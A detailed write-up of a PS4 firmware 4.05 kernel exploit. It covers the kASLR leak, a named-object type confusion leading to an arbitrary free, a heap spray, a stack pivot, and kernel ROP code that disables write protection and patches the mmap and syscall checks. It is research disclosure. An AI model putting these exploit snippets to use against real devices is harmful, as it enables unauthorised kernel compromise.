Introduction

NOTE: Let it be said that I neither condone nor endorse piracy. As such, neither the exploit nor this write-up contains anything to enable piracy on the system.

Welcome to my PS4 kernel exploit write-up for 4.05. In this write-up I will provide a detailed explanation of how my public exploit implementation works, and I will break it down step by step. You can find the full source of the exploit here. The userland exploit will not be covered in this write-up; however, I have already provided a write-up on this userland exploit in the past, so if you wish to check that out, click here. Let's jump into it.

Changes since 1.76

Some notable things have changed since the 1.76 firmware. Most notably, Sony fixed the bug that let us allocate RWX memory from an unprivileged process. The process we hijack via the WebKit exploit no longer has RWX memory mapping permissions, as JIT is now properly handled by a separate process. Calling sys_mmap() with the execute flag will succeed; however, any attempt to actually execute this memory as code will result in an access violation. This means that our kernel exploit must be implemented entirely in ROP chains, no C payloads this time.

Another notable change is that kernel ASLR (kASLR) is enabled on firmware after 1.76.

Some newer system calls have also been implemented since 1.76. On 1.76, there were 85 custom system calls. On 4.05, we can see there are 120 custom system calls.

Sony has also removed system call 0, so we can no longer call any system call we like by specifying the call number in the rax register. We will have to use wrappers from the libkernel.sprx module provided to us to access system calls.

Stage 1 - Information Disclosure

The first stage of the exploit is to obtain important information from the kernel. To do this, we need a kernel information disclosure (leak). A leak happens when kernel memory is copied out to the user but the buffer (or at least part of it) is not initialized, so uninitialized memory is copied to the user. This means that if some function called beforehand stored pointers (or any data, for that matter) in this memory, it will be leaked. Attackers can use this to their advantage by calling a setup function first to leak specific memory for crafting exploits. This is what we will do, and I take full advantage of this leak to obtain three pieces of information.

Helpful information

I thought I'd include this section to help those who don't know how FreeBSD address prefixes work. It's important to know how to distinguish userland and kernel pointers, and which kernel pointers are stack, heap, or .text pointers.

FreeBSD uses a "limit" to define which pointers are userland and which are kernel. Userland addresses can go up to 0x7FFFFFFFFFFF. A kernel address is denoted by having the 0x800000000000 bit set. In the kernel, the upper 32 bits are set to an address prefix that specifies what type of kernel address it is, and the lower 32 bits hold the rest of the virtual address. The prefixes are as follows, where x can be any hexadecimal digit of the address, and y is an arbitrary hexadecimal digit of the heap address prefix, which is randomized at boot as per kASLR:

0xFFFFFFFFxxxxxxxx = Kernel .text pointer
0xFFFFFF80xxxxxxxx = Kernel stack pointer
0xFFFFyyyyxxxxxxxx = Kernel heap pointer
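
The prefix rules above can be sketched as a small classifier. This is only an illustration and not part of the exploit: classifyPointer is a hypothetical helper name, the sample addresses are made up, and addresses are passed as BigInt values for readability rather than through the int64 type the exploit code uses.

```javascript
// Hypothetical helper: classify a 64-bit address by the prefixes listed above.
// Addresses are BigInts so the full 64-bit value is preserved.
function classifyPointer(addr) {
  const USER_LIMIT = 0x7FFFFFFFFFFFn;        // highest userland address
  if (addr <= USER_LIMIT) return "userland";

  const prefix = addr >> 32n;                // upper 32 bits: the address prefix
  // .text and stack are checked first because they also start with 0xFFFF.
  if (prefix === 0xFFFFFFFFn) return "kernel .text";
  if (prefix === 0xFFFFFF80n) return "kernel stack";
  if ((prefix >> 16n) === 0xFFFFn) return "kernel heap"; // 0xFFFFyyyy, yyyy randomized at boot
  return "unknown";
}

// Made-up sample addresses, one per category.
console.log(classifyPointer(0x0000000200000000n));
console.log(classifyPointer(0xFFFFFFFFA1611E96n));
console.log(classifyPointer(0xFFFFFF8012345678n));
console.log(classifyPointer(0xFFFFA3B012345678n));
```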

Vector sys_thr_get_ucontext

System call 634, sys_thr_get_ucontext(), allows you to obtain information on a given thread. The problem is that some areas of the memory copied out are not initialized, and thus the function leaks memory at certain spots. This vector was patched in 4.50: the buffer is now initialized to 0 via bzero() before it is used.

The biggest issue with this function is that it uses a lot of stack space, so we're very limited in what we can use for our setup function. Our setup function must subtract over 0x500 from rsp all in one go, and whatever we leak will be deep in the code.

This part of the exploit took the most time and research, as it is difficult to know what you are leaking without a debugger; it takes some educated guesses and experimentation to find an appropriate object. Getting the math down perfectly won't do much good either, because functions can change quite significantly between firmwares, especially when it's a jump like 1.76 to 4.05. This step took me around 1-2 months in my original exploit.

Implementation

Thread Creation

To call sys_thr_get_ucontext() successfully, we must create a thread first, an ScePthread specifically. We can do this using a function from libkernel, scePthreadCreate(). The signature is as follows:

scePthreadCreate(ScePthread *thr, const ScePthreadAttr *attr, void *(*entry)(void *), void *arg, const char *name)

We can call this in WebKit on 4.05 at offset 0x11570 in libkernel.

Upon success, scePthreadCreate() should return a valid thread handle, and should fill the buffer passed in to ScePthread *thr with an ScePthread struct - we need this as it will hold the thread descriptor we will use in subsequent calls for the leak.

Thread Suspension

Unfortunately, you cannot call sys_thr_get_ucontext() on an active thread, so we must also suspend the thread before we can leak anything. We can do this via sys_thr_suspend_ucontext(). The function signature is as follows:

sys_thr_suspend_ucontext(int sceTd)

Calling this in WebKit is simple. We just need to dereference the value at offset 0 of the buffer we provided to scePthreadCreate(); this is the thread descriptor for the ScePthread.

Setup Function

As stated earlier, we need a setup function that uses over 0x500 of stack space between the surface function and any functions it may call. Opening a file (a device, for example) is a good place to look, because open() itself uses a lot of stack space, and it will also run through a bunch of other subroutines such as filesystem functions.

I found that by opening the "/dev/dipsw" device driver, I was able to leak not only a good object (which I will detail more in the "Object Leak" section below), but also kernel .text pointers. This will help us defeat kASLR for kernel patches and gadgets in our kernel ROP chain (from now on we will abbreviate this as "kROP chain").

Leak!

Finally, we can call sys_thr_get_ucontext() to get our leak. The signature is as follows:

sys_thr_get_ucontext(int sceTd, char *buf)

We simply pass sceTd (the same one we got from creation and passed to sys_thr_suspend_ucontext), and pass a pointer to our buffer as the second argument. When the call returns, we will have leaked kernel information in buf.

kASLR Defeat

First, we want to locate the kernel's .text base address. This will be helpful for post-exploitation work; for example, cr0 gadgets are typically only available in kernel .text, as userland does not directly manipulate the cr0 register. We will want to manipulate the cr0 register to disable kernel write protection for kernel patching. How can we do this? We can simply leak a kernel .text pointer and subtract its slide (its offset from the start of the .text segment) to find the base address of the kernel.

In our buffer containing the leaked memory, we can see at offset 0x128 we are leaking a kernel .text address. This is also convenient, because as you will see in the next section "Object Leak", it is adjacent to our object leak in memory, so it will also help us verify the integrity of our leak. Because I had a dump of 4.05 kernel already from my previous exploit, I found the slide of this .text pointer to be 0x109E96. For those curious, it is a pointer to the section in _vn_unlock() where the flags are checked before unlocking a vnode.

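A good indication that your slide is correct is alignment: the kernel .text base is always aligned to 0x4000, which is the PS4's page boundary. This means the low 14 bits of your kernel .text base address should be zero, so it should end in '000' with the preceding hex digit being 0, 4, 8, or C.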
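
As a worked example of the subtraction and the alignment check, here is a minimal sketch using BigInt arithmetic. The slide 0x109E96 comes from the text; the leaked pointer value and the helper name kernelBaseFromLeak are made up purely to show the arithmetic.

```javascript
// Sketch: derive the kernel base from a leaked .text pointer and sanity-check it.
const LEAK_SLIDE = 0x109E96n;   // slide of the leaked .text pointer on 4.05 (from the text)
const PAGE_MASK = 0x3FFFn;      // low 14 bits must be zero for 0x4000 alignment

function kernelBaseFromLeak(leakedTextPtr) {
  const base = leakedTextPtr - LEAK_SLIDE;
  return { base, aligned: (base & PAGE_MASK) === 0n };
}

// Hypothetical leaked value, chosen only for illustration.
const sampleLeak = kernelBaseFromLeak(0xFFFFFFFFA1611E96n);
console.log("0x" + sampleLeak.base.toString(16).toUpperCase(), sampleLeak.aligned);
```

If the slide were wrong, or the leak were not the pointer we expect, the computed base would almost certainly fail the alignment test, which is why the same check doubles as an integrity check on the leak.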

Object Leak

Secondly, we need to leak an object in the heap that we can later free() and corrupt to obtain code execution. Some objects are also much better candidates than others. The following traits make for a good object for exploitation:

1. Has function pointers. Not needed per se, as you could obtain arbitrary kernel R/W and use that to corrupt some other object, but function pointers are ideal.
2. Localized. Ideally, you don't want an object that is used by some other area in the kernel, because this could make the exploit racy and less stable.
3. Easy to fake. We need an object that doesn't require leaking a bunch of other pointers to fake when we heap spray.

Objects associated with things like file descriptors make for great targets!

At offset 0x130, it seems we leak a cdev_priv object, which is the kind of object that represents a character device in memory. It seems this object leaks from the devfs_open() function, which also explains our _vn_unlock() leak at 0x128 for the ASLR defeat.

Unfortunately, not all objects we leak are going to meet the ideal criteria. This object breaks criterion 2; luckily, however, it meets criterion 3 and we can fake it perfectly. Nothing else will use the dipsw device driver while our exploit runs, meaning that even though our exploit uses a global object, it is still incredibly stable. It also has a bunch of function pointers we can use to hijack code execution via the cdev_priv->cdp_c.si_devsw object, meeting criterion 1.

We can also see that cdev_priv objects are allocated in devfs_alloc(), which is eventually called by make_dev(). Luckily, cdev_priv objects are malloc()'d and not zone allocated, so we should have no issues freeing it.

src

struct cdev *
devfs_alloc(int flags)
{
    struct cdev_priv *cdp;
    struct cdev *cdev;
    struct timespec ts;

    cdp = malloc(sizeof *cdp, M_CDEVP, M_USE_RESERVE | M_ZERO | ((flags & MAKEDEV_NOWAIT) ? M_NOWAIT : M_WAITOK));
        
    if (cdp == NULL)
        return (NULL);

    // ...

    cdev = &cdp->cdp_c;

    // ...

    return (cdev);
}

Stack Pivot Fix

One last piece of information we need is a stack address. The reason is that when we stack pivot to run our ROP chain in kernel mode, we need to return to userland cleanly, which means restoring the stack pointer (rsp) that the pivot clobbered.

Luckily, because kernel stacks are per-thread, we can use a stack address that we leak to calculate the return location for when the ROP chain finishes executing. I made this calculation by taking the difference between the base pointer (rbp) at the point where the kernel jumps to our controlled function pointer and a stack pointer that leaks. At offset 0x20 in the leak buffer we can see a stack address, and I found the difference to be 0x3C0.

Putting it all together

First, we will create our thread for the sys_thr_get_ucontext leak, and set its entry point to an infinite loop gadget so it keeps running. We'll also create a ROP chain for stage 1, where we will open /dev/dipsw and leak, and we'll set up the namedobj for stage 3 as well.

var createLeakThr = p.call(libkernel.add32(0x11570), leakScePThrPtr, 0, window.gadgets["infloop"], leakData, stringify("leakThr"));
p.write8(namedObj, p.syscall('sys_namedobj_create', stringify("debug"), 0xDEAD, 0x5000));

Then to leak, we will suspend the thread, open the /dev/dipsw device driver, and leak the cdev_priv object.

var stage1 = new rop(p, undefined);

stage1.call(libkernel.add32(window.syscalls[window.syscallnames['sys_thr_suspend_ucontext']]), p.read4(p.read8(leakScePThrPtr)));
stage1.call(libkernel.add32(window.syscalls[window.syscallnames['sys_open']]), stringify("/dev/dipsw"), 0, 0);
stage1.saveReturnValue(targetDevFd);
stage1.call(libkernel.add32(window.syscalls[window.syscallnames['sys_thr_get_ucontext']]), p.read4(p.read8(leakScePThrPtr)), leakData);

stage1.run();

Before continuing with the exploit, it's good for stability to include an integrity check on the leak to make sure you're leaking the right object. The check verifies that the base address derived from the kernel .text leak is page-aligned. This allows us to defeat kASLR and validate the leak all at once.

// Extract leaks
kernelBase = p.read8(leakData.add32(0x128)).sub32(0x109E96);
objBase = p.read8(leakData.add32(0x130));
stackLeakFix = p.read8(leakData.add32(0x20));

if(kernelBase.low & 0x3FFF)
{
    alert("Bad leak! Terminating.");
    return false;
}

Stage 2 - Arbitrary Free

A combination of design flaws led to a critical bug in the kernel, which allows an attacker to free() an arbitrary address. The issue lies in the idt hash table that Sony uses for named objects. I won't go in depth on the idt hash table, as that's already been covered by fail0verflow's public write-up. The main issue is that Sony stores the object's type as well as flags in one field, and allows the user to specify it. This means the attacker can cause type confusion, which later leads to an arbitrary free() situation.

Vector 1 - sys_namedobj_create

By creating a named object with type = 0x5000 (or 0x4000 due to the function OR'ing the ID with 0x1000), we can cause type confusion in the idt hash table. Upon success, it returns an ID of the named object.

Vector 2 - sys_mdbg_service

When sys_mdbg_service() goes to write bytes passed in from a userland buffer at offset 0x4 to 0x8 to the named object returned, it actually writes to the wrong object due to type confusion. This allows the attacker to overwrite the pointer's lower 32-bits in the named object with any value.

Vector 3 - sys_namedobj_delete

When sys_namedobj_delete() is called, it first free()s the pointer at offset 0 of the object before free()ing the object itself. Because we can control 0x4-0x8 in the object in sys_mdbg_service() via type confusion, we can control the lower 32 bits of the pointer that is free()'d here. Luckily, because this object is SUPPOSED to contain a heap pointer at offset 0, the heap address prefix is set for us. If this were not the case, this bug would not be exploitable.
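
To see why the pre-set heap prefix matters, here is a minimal sketch of what happens when only the lower 32 bits of a pointer are attacker-controlled. The helper name replaceLow32 and all addresses are made up for illustration; the point is simply that the resulting pointer only equals our target when the target shares the existing upper 32 bits.

```javascript
// Sketch: the pointer that results when only its lower 32 bits are overwritten.
function replaceLow32(originalPtr, attackerValue) {
  const HIGH_MASK = 0xFFFFFFFF00000000n;
  const LOW_MASK = 0x00000000FFFFFFFFn;
  return (originalPtr & HIGH_MASK) | (attackerValue & LOW_MASK);
}

// Hypothetical addresses sharing a made-up heap prefix (0xFFFFA3B0).
const legitimatePtr = 0xFFFFA3B011112222n; // heap pointer the kernel stored in the object
const heapTarget = 0xFFFFA3B0DEADB000n;    // heap object we want free()'d

// Same prefix: the corrupted pointer is exactly our target.
const freedPtr = replaceLow32(legitimatePtr, heapTarget);
console.log(freedPtr === heapTarget);

// Different prefix (a .text address here): the target cannot be reached.
const textTarget = 0xFFFFFFFFA1611E96n;
console.log(replaceLow32(legitimatePtr, textTarget) === textTarget);
```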

Implementation

Creating a named object

The first thing we need to do is create a named object to put in the idt with the malicious 0x5000 type. We can do that via the sys_namedobj_create() system call like this:

p.write8(namedObj, p.syscall('sys_namedobj_create', stringify("debug"), 0xDEAD, 0x5000));

Writing a pointer to free

We need to be able to write to the no->name field of the named object, because when we cause type confusion and delete the object, the address free()'d will be taken from the lower 32-bits of the no->name field. To do this, we can use the sys_mdbg_service() system call, like so:

p.write8(serviceBuff.add32(0x4), objBase);
p.writeString(serviceBuff.add32(0x28), "debug");
        
// ...

var stage3 = new rop(p, undefined);

stage3.call(libkernel.add32(window.syscalls[window.syscallnames['sys_mdbg_service']]), 1, serviceBuff, 0);

Free!

Finally, we need to trigger the free() on the address we wrote via sys_namedobj_delete(). Because the object is cast to a namedobj_dbg_t type, it will free() the address specified at offset 0x4 (which is no->name in namedobj_usr_t). It is remarkable that this is the field that is free()'d, and that the field's upper 32 bits will already be set to the heap address prefix due to it being a pointer to the object's name. If this were not the case, we could not create a use-after-free scenario, as we would not be able to set the upper 32 bits, and this type confusion bug might otherwise be unexploitable.

We can trigger the free() by simply deleting our named object via:

stage3.call(libkernel.add32(window.syscalls[window.syscallnames['sys_namedobj_delete']]), p.read8(namedObj), 0x5000);

Stage 3 - Heap Spray/Object Fake

In this section I'll detail a little of what heap spraying is for those newer to exploitation. If you already know how it works, feel free to skip this section.

Helpful information

Memory allocators have to be efficient, because allocating brand new memory is costly in terms of performance. To be more efficient, heap memory is typically sectioned into "chunks" (also called "buckets"), and these chunks are typically marked as "used" or "free". To save performance, if an allocation is requested, the kernel will first check to see if it can give you a chunk that's already been allocated (but marked "free") of a similar size before allocating a new chunk.

The chunk sizes are powers of 2 starting at 16, meaning you can get chunks of size 0x10, 0x20, 0x40, 0x80, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000, or 0x4000. You can find these defined in the kmemzones array in FreeBSD's source file responsible for memory allocation, kern_malloc.c.

We can abuse this to control the data of our free()'d object, and thus corrupt it. The cdev_priv object is 0x180 in size, meaning it will use a chunk of size 0x200. So if we continuously allocate, write, and deallocate a chunk of memory of a size above 0x100 and no larger than 0x200, eventually one of those malloc() calls should return the address of the free()'d object, which means the data we write lands on top of it and corrupts the object's backing memory. This is called spraying the heap.
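
The size-to-chunk mapping can be sketched as follows. This is a simplified model of the power-of-two sizes listed above, not the kernel's actual allocator code, and chunkSizeFor is a hypothetical helper name.

```javascript
// Simplified model of the chunk sizes listed above: round a request up to the
// next power of two, starting at 0x10 and capped at 0x4000.
function chunkSizeFor(requestSize) {
  if (requestSize > 0x4000) throw new RangeError("request too large for this model");
  let size = 0x10;
  while (size < requestSize) size *= 2;
  return size;
}

// The 0x180-byte cdev_priv and a 0x120-byte spray buffer share a chunk size.
console.log("0x" + chunkSizeFor(0x180).toString(16));
console.log("0x" + chunkSizeFor(0x120).toString(16));
```

Because both requests round up to the same chunk size, a spray allocation can be handed the chunk that the free()'d object used to occupy.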

For more information on heap spraying, see here.

Corrupting the object

We're going to spray the heap with our fake object that we've created in userland. Our faked object will prevent the kernel from crashing by faking the data we need to, and allow us to obtain code execution by hijacking a function pointer in the object. First let's take a look at the cdev object, which is the first member (inlined) of cdev_priv. For reference, each member is annotated with its offset in the structure.

So as not to make this write-up longer than it needs to be, I will only include some of the pointers that I faked. Other integers in the struct, such as flags, mode, and the time stamp members, I took from dumping the object live.

The cdev object

The cdev object is the core of the cdev_priv object, and contains important information about the device. Notably, it includes the name of the device, its operations vtable, reference counts, and a linked list to previous and next cdev_priv devices.

src

struct cdev {
	void            *__si_reserved;					// 0x000
	u_int           si_flags;					// 0x008
	struct timespec si_atime;					// 0x010
	struct timespec si_ctime;				        // 0x020
	struct timespec si_mtime;					// 0x030
	uid_t           si_uid;						// 0x040
	gid_t           si_gid;						// 0x044
	mode_t          si_mode;					// 0x048
	struct ucred    *si_cred;					// 0x050
	int             si_drv0;					// 0x058
	int             si_refcount;					// 0x05C
	LIST_ENTRY(cdev)        si_list;				// 0x060
	LIST_ENTRY(cdev)        si_clone;				// 0x070
	LIST_HEAD(, cdev)       si_children;	    		        // 0x080
	LIST_ENTRY(cdev)        si_siblings;	    		        // 0x088
	struct cdev *si_parent;						// 0x098
	char            *si_name;					// 0x0A0
	void            *si_drv1, *si_drv2;				// 0x0A8
	struct cdevsw   *si_devsw;					// 0x0B8
	int             si_iosize_max;                                  // 0x0C0
	u_long          si_usecount;					// 0x0C8
	u_long          si_threadcount;					// 0x0D0
	union {
		struct snapdata *__sid_snapdata;
	} __si_u;							// 0x0D8
	char            __si_namebuf[SPECNAMELEN + 1];	                // 0x0E0
};

si_name

The si_name member points to the __si_namebuf buffer inside the object, which is 64 bytes in length. Normally, the string "dipsw" is written here. We're going to overwrite it, though, for our stack pivot, which will be the objective of the next stage. It is important to fix this post-exploit, because other processes that want to open the "dipsw" device driver will not be able to if the name is not set properly, as the device cannot be identified.

p.write8(obj_cdev_priv.add32(0x0A0), objBase.add32(0x0E0));
p.write8(obj_cdev_priv.add32(0x0E0), window.gadgets["ret"]); // New RIP value for stack pivot
p.write8(obj_cdev_priv.add32(0x0F8), kchainstack); // New RSP value for stack pivot

si_devsw

si_devsw is our ultimate target object. It's usually a static object in kernel .text which contains function pointers for all sorts of operations on the device, including ioctl(), mmap(), open(), and close(). We can fake this pointer and make it point to an object we set up in userland, as the PS4 does not have Supervisor Mode Access Prevention (SMAP).

p.write8(obj_cdev_priv.add32(0x0B8), obj_cdevsw); // Target Object

The (rest of the) cdev_priv object

Originally, I spent a lot of time trying to fake the members from 0x120 to 0x180 in the object. Some of these members are difficult to fake, as there are linked lists and pointers to objects that are in completely different zones. We can use a neat trick to avoid faking any of this data in our spray. I will cover this in more depth when we get to the heap spray specifics.

The cdevsw object

The cdevsw object is a vtable which contains function pointers for various operations such as open(), close(), ioctl(), and many more. Thankfully because the "dipsw" device driver isn't used while we're exploiting, we can just pick one to overwrite (I chose ioctl()), trigger code execution, and fix the pointer back to the proper kernel .text location post-exploit.

src

struct cdevsw {
	int                     d_version;			// 0x00
	u_int                   d_flags;			// 0x04
	const char              *d_name;			// 0x08
	d_open_t                *d_open;			// 0x10
	d_fdopen_t              *d_fdopen;			// 0x18
	d_close_t               *d_close;			// 0x20
	d_read_t                *d_read;			// 0x28
	d_write_t               *d_write;			// 0x30
	d_ioctl_t               *d_ioctl;			// 0x38
	d_poll_t                *d_poll;			// 0x40
	d_mmap_t                *d_mmap;			// 0x48
	d_strategy_t            *d_strategy;		        // 0x50
	dumper_t                *d_dump;	    	        // 0x58
	d_kqfilter_t            *d_kqfilter;		        // 0x60
	d_purge_t               *d_purge;			// 0x68
	d_mmap_single_t         *d_mmap_single;		        // 0x70

	int32_t                 d_spare0[3];		        // 0x78
	void                    *d_spare1[3];		        // 0x88

	LIST_HEAD(, cdev)       d_devs;				// 0xA0
	int                     d_spare2;			// 0xA8
	union {
		struct cdevsw           *gianttrick;
		SLIST_ENTRY(cdevsw)     postfree_list;
	} __d_giant;					        // 0xB0
};

Target - d_ioctl

We're going to overwrite the d_ioctl address with our stack pivot gadget. When we go to call ioctl() on our opened device driver, the kernel will jump to our stack pivot gadget, run our kROP chain, and cleanly exit.

p.write8(obj_cdevsw.add32(0x38), libcBase.add32(0xa826f)); // d_ioctl - TARGET FUNCTION POINTER

This is another member we must fix post-exploit. If anything else that uses "dipsw" (which is quite a lot of other processes) goes to perform an operation such as open(), it will crash the kernel, because other processes do not have access to WebKit's mapped memory and therefore cannot reach your faked object in userland.

Spray

We can use the ioctl() system call to spray using a bad file descriptor. The system call will first malloc() memory, with the size specified by the caller via the command parameter, and will copyin() data we control into the allocated buffer. Due to the bad file descriptor, the system call will then free the buffer and exit with an error. It's a perfect vector for a spray because we control the size and the data being copied in, and the buffer is immediately free()'d.

The neat trick I mentioned earlier is using a size of 0x120 for our spray's copyin(). Because 0x120 is greater than 0x100 and less than 0x200, the chunk size matches our target object. However, because we are only specifying 0x120 for the copyin(), any data between 0x120 and 0x180 will not be written to, meaning it will not get corrupted. No need to fake linked lists or attempt to fake pointers that we can't fake perfectly.

for(var i = 0; i < 500; i++)
{
    stage3.call(libkernel.add32(window.syscalls[window.syscallnames['sys_ioctl']]), 0xDEADBEEF, 0x81200000, obj_cdev_priv);
}

stage3.run();
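
For those wondering where the 0x120 comes from in the command value 0x81200000, the following sketch decodes it using the ioctl command layout from FreeBSD's sys/ioccom.h (direction flags in the top bits, a 13-bit parameter length starting at bit 16). The helper name decodeIoctl is hypothetical.

```javascript
// Field layout of a FreeBSD ioctl command word (sys/ioccom.h).
const IOC_OUT = 0x40000000;   // kernel copies parameters out to the user
const IOC_IN = 0x80000000;    // kernel copies parameters in from the user
const IOCPARM_MASK = 0x1FFF;  // parameter length is 13 bits wide

function decodeIoctl(cmd) {
  return {
    copiesIn: ((cmd & IOC_IN) >>> 0) !== 0,
    copiesOut: ((cmd & IOC_OUT) >>> 0) !== 0,
    length: (cmd >>> 16) & IOCPARM_MASK, // size of the buffer to allocate and copy
  };
}

const sprayCmd = decodeIoctl(0x81200000);
console.log(sprayCmd.copiesIn, sprayCmd.copiesOut, "0x" + sprayCmd.length.toString(16));
```

So the command asks for a copy-in of 0x120 bytes, which is what makes the kernel allocate a buffer of that size and fill it with our data.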

Stage 4 - Kernel Stack Pivot

To execute our ROP chain, we need to pivot the stack to that of our ROP chain. To do this, we can use a gadget in the libc module. This gadget loads rsp from [rdi + 0xF8] and pushes [rdi + 0xE0], which we can use to set RIP to the ret gadget. We control the memory rdi points to, as rdi is going to be loaded with the cdev object we faked. Below is a snippet of the stack pivot gadget we will use from sceLibcInternal.sprx:

mov     rsp, [rdi+0F8h]
mov     rcx, [rdi+0E0h]
push    rcx
mov     rcx, [rdi+60h]
mov     rdi, [rdi+48h]
retn

Luckily, offsets 0xE0 and 0xF8 both fall inside the __si_namebuf member of cdev, which can easily be fixed post-exploit.
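
To make the effect of the gadget concrete, here is a toy model that steps through it. This is only a sketch: memory is modeled as a Map of BigInt addresses to qwords, runPivotGadget is a hypothetical name, and every address below is made up.

```javascript
// Toy model of the pivot gadget. Memory is a Map from BigInt address to
// BigInt qword; rdi points at the faked object.
function runPivotGadget(mem, rdi) {
  let rsp = mem.get(rdi + 0xF8n);      // mov rsp, [rdi+0F8h]
  const rcx = mem.get(rdi + 0xE0n);    // mov rcx, [rdi+0E0h]
  rsp -= 8n;                           // push rcx
  mem.set(rsp, rcx);
  // The loads from [rdi+60h] and [rdi+48h] do not affect control flow here.
  const rip = mem.get(rsp);            // retn pops the pushed value into rip
  rsp += 8n;
  return { rip, rsp };
}

// Hypothetical addresses for illustration only.
const fakeObjAddr = 0xFFFFA3B0DEADB000n;   // where the faked cdev lives
const retGadgetAddr = 0x0000000800001234n; // a "ret" gadget
const kchainAddr = 0x0000000900000000n;    // start of the kROP chain buffer

const pivotMem = new Map([
  [fakeObjAddr + 0xE0n, retGadgetAddr],
  [fakeObjAddr + 0xF8n, kchainAddr],
]);
const pivoted = runPivotGadget(pivotMem, fakeObjAddr);
console.log(pivoted.rip === retGadgetAddr, pivoted.rsp === kchainAddr);
```

After the gadget returns, execution is at the ret gadget with rsp pointing at the start of the chain, so that ret pops the chain's first entry. Note that the push writes 8 bytes just below the chain's start address, so that memory has to be writable as well.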

From devfs_ioctl_f() in /fs/devfs/devfs_vnops.c (src):

// ...
dev_relthread(dev, ref);
// ...
error = dsw->d_ioctl(dev, com, data, fp->f_flag, td);
// ...

This is where the kernel will call the function pointer that we control. Notice rdi is loaded with dev, which is the cdev object we control. We can easily implement this stack pivot in our object fake, like so:

p.write8(obj_cdev_priv.add32(0x0E0), window.gadgets["ret"]); // New RIP value for stack pivot
// ...
p.write8(obj_cdev_priv.add32(0x0F8), kchainstack); // New RSP value for stack pivot
// ...
p.write8(obj_cdevsw.add32(0x38), libcBase.add32(0xa826f)); // d_ioctl - TARGET FUNCTION POINTER

Here is an excellent resource on stack pivoting and how it works for those interested.

Stage 5 - Building the Kernel ROP Chain

Our kROP or kernel ROP chain is going to be a chain of instructions that we run from supervisor mode. We want to accomplish a few things with this chain. First, we want to apply a few kernel patches to allow us to run payloads and escalate our privileges. Finally before returning we'll want to fix the object to stabilize the kernel.

Disabling Kernel Write Protection

We have to disable the write protection on the kernel .text before we can make any patches. We can use the mov cr0, rax gadget to do this. The cr0 register contains various control flags for the CPU, one of which is the "WP" bit at bit 16. By unsetting this, we can write to read-only memory pages in ring0, such as kernel .text.

// Disable kernel write protection
kchain.push(window.gadgets["pop rax"]);      // rax = 0x80040033;
kchain.push(0x80040033);
kchain.push(kernelBase.add32(0x389339));     // mov cr0, rax;

For more information on the cr0 control register, see the OSDev wiki.
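
As a small worked example of where the constant 0x80040033 comes from, the sketch below clears bit 16 of a cr0 value. The starting value 0x80050033 is an assumption made for illustration (it is the chain's value with only the WP bit set again), and clearWriteProtect is a hypothetical helper name.

```javascript
// Sketch: clear the WP (write protect) bit, bit 16, in a cr0 value.
const CR0_WP = 1 << 16;

function clearWriteProtect(cr0) {
  return (cr0 & ~CR0_WP) >>> 0; // >>> 0 keeps the result an unsigned 32-bit value
}

// Assumed pre-patch value: the chain's constant with WP still set.
const patchedCr0 = clearWriteProtect(0x80050033);
console.log("0x" + patchedCr0.toString(16)); // 0x80040033
```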

Allowing RWX Memory Mapping

We want to be able to run C payloads and run our loader, so we need to patch the mmap system call to allow us to set the execute bit to map RWX memory pages.

seg000:FFFFFFFFA1824FD9                 mov     [rbp+var_61], 33h
seg000:FFFFFFFFA1824FDD                 mov     r15b, 33h

These are the maximum allowed permission bits the user is allowed to pass to sys_mmap() when mapping memory. By changing 0x33 in both of these move instructions to 0x37, it will allow us to specify the execute bit successfully.

// Patch sys_mmap: Allow RWX (read-write-execute) mapping
var kernel_mmap_patch = new int64(0x37B74137, 0x3145C031);
kchain.write64(kernelBase.add32(0x31CFDC), kernel_mmap_patch);
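
To see how the patch value lines up with the disassembly, the sketch below expands it into the bytes that land in memory. It assumes the two int64 arguments are the low and high dwords in that order, which is consistent with the patch being written at the address of the first instruction's immediate byte; patchBytes is a hypothetical helper name.

```javascript
// Sketch: expand a 64-bit patch given as (low dword, high dword) into the
// bytes written to memory on a little-endian machine.
function patchBytes(low, high) {
  const bytes = [];
  for (const dword of [low, high]) {
    for (let i = 0; i < 4; i++) bytes.push((dword >>> (8 * i)) & 0xFF);
  }
  return bytes;
}

const mmapPatchBytes = patchBytes(0x37B74137, 0x3145C031);
console.log(mmapPatchBytes.map(b => b.toString(16).padStart(2, "0")).join(" "));
// 37 41 b7 37 31 c0 45 31
```

The first byte (37) replaces the 0x33 immediate of the first mov, and the next three bytes (41 b7 37) are mov r15b, 37h. The remaining four bytes belong to the instructions that follow the second mov.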

Syscall Anywhere

Sony checks and ensures that a syscall instruction can only be issued from the memory range of the libkernel.sprx module. They also check the instructions around it to ensure it keeps the format of a typical wrapper. These patches will allow us to use the syscall instruction in our ROP chain, which will be important for fixing the object later.

The first patch allows kernel processes to initiate syscall instructions. This is because processes have a p_dynlib member that specifies if libkernel has been loaded. This patch makes certain that any module can call syscall even if the libkernel module has not yet been loaded.

seg000:FFFFFFFFA15F5095                 mov     ecx, 0FFFFFFFFh

Which is patched to

mov ecx, 0x0

The second patch forces a jump below check to fail, so that our first patch is put to use.

seg000:FFFFFFFFA15F50BB                 cmp     rdx, [rax+0E0h]
seg000:FFFFFFFFA15F50C2                 jb      short loc_FFFFFFFFA15F50D7

Which is patched to

seg000:FFFFFFFFA15F50BB                 jmp     loc_FFFFFFFFA15F513D

This will allow WebKit to issue a syscall instruction directly.

// Patch syscall: syscall instruction allowed anywhere
var kernel_syscall_patch1 = new int64(0x0000000, 0xF8858B48);
var kernel_syscall_patch2 = new int64(0x0007DE9, 0x72909000);
kchain.write64(kernelBase.add32(0xED096), kernel_syscall_patch1);
kchain.write64(kernelBase.add32(0xED0BB), kernel_syscall_patch2);
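
The first five bytes of the second patch are a near jump, and its encoding can be checked by hand. The sketch below encodes jmp rel32 (opcode E9, displacement relative to the end of the 5-byte instruction) using the two addresses from the disassembly above; encodeJmpRel32 is a hypothetical helper name.

```javascript
// Sketch: encode `jmp rel32` (opcode E9) from one address to another.
function encodeJmpRel32(from, to) {
  const rel = to - (from + 5n); // displacement is relative to the next instruction
  if (rel < -0x80000000n || rel > 0x7FFFFFFFn) {
    throw new RangeError("target out of rel32 range");
  }
  const bytes = [0xE9];
  const unsigned = BigInt.asUintN(32, rel);
  for (let i = 0n; i < 4n; i++) {
    bytes.push(Number((unsigned >> (8n * i)) & 0xFFn)); // little-endian displacement
  }
  return bytes;
}

const jmpBytes = encodeJmpRel32(0xFFFFFFFFA15F50BBn, 0xFFFFFFFFA15F513Dn);
console.log(jmpBytes.map(b => b.toString(16).padStart(2, "0")).join(" "));
// e9 7d 00 00 00
```

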